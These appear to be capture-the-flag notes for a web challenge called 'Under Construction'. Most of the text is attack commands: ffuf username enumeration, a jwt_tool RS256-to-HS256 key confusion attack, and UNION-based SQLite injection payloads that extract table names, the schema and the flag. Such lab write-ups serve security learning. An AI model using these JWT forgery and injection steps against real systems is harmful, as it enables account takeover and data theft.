# Under Construction

\
ffuf -request req -w ../../usernames.txt -mr exists -u [http://209.97.132.64:32647/auth](http://178.62.107.125:32080/auth) -s\
\
Usernames:\
gale\
rosie\
\
• Key Confusion \[RS256 > HS256]\
./jwt\_tool.py -t <http://209.97.132.64:32365/> -rc "session=\[jwt]" -X k -pk ../../challenges/uc/pk -v\
\
• sqlite\_version()\
<> -I -pc username -pv "test123' union select 1,sqlite\_version(),3 -- "\
\
• table name\
-I -pc username -pv "test123' union select 1,(select tbl\_name from sqlite\_master limit 0,1),3 -- "\
\
• column names \[table create query in output is referred to check the column names]\
-I -pc username -pv "test123' union select 1,(select sql from sqlite\_master limit 0,1),3 -- "\
\
• flag\
-I -pc username -pv "test123' union select 1,(select \<column-name> from \<tname> limit 0,1),3 -- "\
\
\
\-------------------------------------------------\
observations:\
\-------------------------------------------------\
• JWT public key is present in JWT token\
• ~~Enumerate usernames~~\
• JWT key confusion due to accepting both RS256 and HS256\
• sqli is present on getUser request as input not escaped<br>